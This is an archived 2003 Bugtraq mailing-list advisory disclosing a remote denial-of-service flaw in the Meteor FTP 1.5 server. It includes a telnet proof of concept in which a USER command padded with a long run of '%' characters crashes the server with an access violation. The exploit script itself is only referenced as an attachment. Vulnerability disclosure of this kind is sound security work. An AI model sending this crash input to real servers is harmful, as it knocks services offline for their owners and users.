lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sat, 9 Aug 2003 13:31:13 -0400 (EDT)
From: Zee <zerash@...cted.org>
To: bugtraq@...urityfocus.com
Subject: Remote denial of service vulnerability in Meteor FTP Version 1.5

www.evicted.org
zerash@...cted.org
August 8, 2003

Meteor FTP Version 1.5 Remote Denial of Service Vulnerability

1. Introduction
----------------
Meteor FTP is a personal ftp server that runs on Windows98/ME/2K/XP.


2. Vulnerability
-----------------
A vulnerability exists in Meteor FTP Version 1.5, which allows any
malicious user to remotely cause a denial of service against the ftp
server.

By connecting to the Meteor FTP server and issuing USER followed by large
amounts of data, the ftp server will crash.


3. Example
-----------
Proof of concept exploit (meteordos.pl) is included in the attachment.

root@...nwire # telnet 192.168.1.14 21
Trying 192.168.1.14...
Connected to 192.168.1.14.
Escape character is '^]'.
220 Service ready for new user
USER
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
530 Not logged on
QUIT
Connection closed by foreign host.
root@...nwire # telnet 192.168.1.14 21
Trying 192.168.1.14...
Connected to 192.168.1.14.
Escape character is '^]'.
USER anonymous
QUIT
telnet> quit
Connection closed.

At this point the server has completely froze up. On the server side, the
Meteor FTP spits out a dialog :

"Error: Access Violation at 0x77FCC992 (Tried to write 0x25252525),
program terminated."

By clicking "OK", Meteor FTP terminates.



4. Vendor status
----------------
Vendor has been notified, waiting for response...


5. Credits
-----------
Vulnerability & code by zerash
You can view this advisory at :
http://www.evicted.org/projects/writings/mftpadvisory.txt
You can view the exploit at :
http://www.evicted.org/projects/code/meteordos.pl


6. Contact
-----------
Please send suggestions, updates, and comments to :
zerash@...cted.org
http://www.evicted.org
View attachment "meteordos.pl" of type "TEXT/PLAIN" (1317 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ